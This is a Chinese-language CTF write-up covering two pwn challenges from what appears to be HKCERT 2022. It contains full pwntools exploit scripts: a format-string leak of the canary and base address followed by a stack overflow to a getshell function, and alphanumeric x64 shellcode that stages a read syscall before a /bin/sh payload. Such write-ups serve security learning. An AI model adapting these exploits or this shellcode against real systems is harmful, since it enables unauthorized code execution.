oin

writeup


2022-11-13

<p>[TOC]</p> <h1>🌓echo</h1> <h2>🌙分析</h2> <p>checksec检查保护</p> <p><img src="https://pic1.imgdb.cn/item/6370b47616f2c2beb1d88caa.png" alt="" /> </p> <p>保护全开了</p> <p><img src="https://pic1.imgdb.cn/item/6370b52216f2c2beb1da3d57.png" alt="" /> </p> <p>程序里包含两个漏洞,printf格式化字符串溢出和scanf的%s缓冲区溢出</p> <p><img src="https://pic1.imgdb.cn/item/6370b60e16f2c2beb1db703e.png" alt="" /> </p> <p>同时程序里包含直接getshell的函数</p> <p><img src="https://pic1.imgdb.cn/item/6370b5af16f2c2beb1db0ab8.png" alt="" /> </p> <p>但是执行的时候发现需要2.34的libc,但是我没有,只能通过盲打来进行,首先确定目标</p> <ul> <li>获取elf加载基地址</li> <li>获取canary值</li> <li>覆盖函数返回地址为getshell函数</li> </ul> <p>我们可以通过格式化字符串任意读来实现前两个目标</p> <p><img src="https://pic1.imgdb.cn/item/6370b6d616f2c2beb1dc7287.png" alt="" /> </p> <p>很容易就知道canary的值和elf中某个函数的地址,偏移量分别为19和21</p> <p><img src="https://pic1.imgdb.cn/item/6370b74f16f2c2beb1dd389a.png" alt="" /> </p> <p>还有要解决的就是需要覆盖全局变量can_level为非0,这里用到了格式化字符串任意写来完成,注意printf遇到“\x00”会截断,所以填写can_leave地址的时候需要后置</p> <h2>🌙Exploit</h2> <pre><code class="language-python">from pwn import* # context.log_level = 'debug' # o = process('./chall') o = remote('chal.hkcert22.pwnable.hk', 28037) payload = "%19$p,\x00 %21$p" o.recvuntil('Input:') o.sendline(payload) o.recvuntil('0x') canary = int(o.recv(16), 16) o.recvuntil('0x') elf_addr = int(o.recv(12), 16) log.info('canary: ' + hex(canary)) log.info('elf_addr: ' + hex(elf_addr)) elf_base = elf_addr - 0x135A getshell = elf_base + 0x1264 can = elf_base + 0x401C payload = 'aaaa%7$n' + p64(can) o.recvuntil('Input:') o.sendline(payload) payload = 'a'*104 + p64(canary) + 'a'*8 + p64(getshell) o.recvuntil('Input:') o.sendline(payload) o.sendline('--') o.interactive() </code></pre> <p><img src="https://pic1.imgdb.cn/item/6370c0ff16f2c2beb1eb69f7.png" alt="" /></p> <h2>🌙附件</h2> <p><a href="https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78">https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78</a> 【FlowUs 息流】echo.zip</p> <h1>🌓shellcode-runner2</h1> <h2>🌙分析</h2> <p><img src="https://pic1.imgdb.cn/item/6370b9ee16f2c2beb1e11103.png" alt="" /> </p> <p>题目是shellcode注入,但是限制shellcode必须是大写字母和数字,如果是x86程序可以直接用alpha3来生成,但是这是x64程序,需要手动来写shellcode</p> <p>跳转去执行shellcode时寄存器值为</p> <p><img src="https://pic1.imgdb.cn/item/6370bd9116f2c2beb1e55d44.png" alt="" /> </p> <p>我个人的想法是实现read系统调用,只需要将rdi置0,rsi不变,rdx只要是一个大数字就行,如果要实现execve(“/bin/sh”, 0, 0)比较前者要难一点,不如用read覆写shellcode,这样写入的shellcode没有任何限制</p> <p>read系统调用实现</p> <pre><code>push rax pop rcx    # 将shellcode地址存储到rcx中 push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax    # 将rax清零 xor al, 0x39 xor al, 0x36 push rax pop rdx    # 产生0xf存储到rdx中 push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax    # rax清零 xor DWORD PTR [rcx+rax*2+0x30], edx    # 写入shellcode+0x30处为0xf xor al, 0x36 xor al, 0x33 push rax pop rdx    # 产生0x5存储到rdx中 push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax    # rax清零 xor DWORD PTR [rcx+rax*2+0x31], edx    # 写入shellcode+0x31处为0x5,最终和0x30处形成指令syscall push rcx pop rcx push rcx pop rcx push rcx pop rcx push rcx pop rdx    # 填充数据,让其执行到shellcode+0x30处 </code></pre> <p>最后对应寄存器的值为rax=0,rdi=0,rsi=shellcode,rdx=shellcode</p> <p>再次写入普通shellcode就行,记得前面填充多个nop指令</p> <h2>🌙Exploit</h2> <pre><code class="language-python">from pwn import * context.arch = 'amd64' # o = process('./chall') o = remote('chal.hkcert22.pwnable.hk', 28130) shellcode = ''' push rax pop rcx push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax xor al, 0x39 xor al, 0x36 push rax pop rdx push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax xor DWORD PTR [rcx+rax*2+0x30], edx xor al, 0x36 xor al, 0x33 push rax pop rdx push rsi push rsp pop rax xor DWORD PTR [rax], esi pop rax xor DWORD PTR [rcx+rax*2+0x31], edx push rcx pop rcx push rcx pop rcx push rcx pop rcx push rcx pop rdx ''' shellcode = asm(shellcode) print shellcode o.sendline(shellcode) payload = asm('nop')*0x50 + asm(shellcraft.sh()) o.sendline(payload) o.interactive() </code></pre> <p><img src="https://pic1.imgdb.cn/item/6370be2916f2c2beb1e6284d.png" alt="" /></p> <h2>🌙附件</h2> <p><a href="https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d">https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d</a> 【FlowUs 息流】shellcode-runner2.zip</p>

页面列表

ITEM_HTML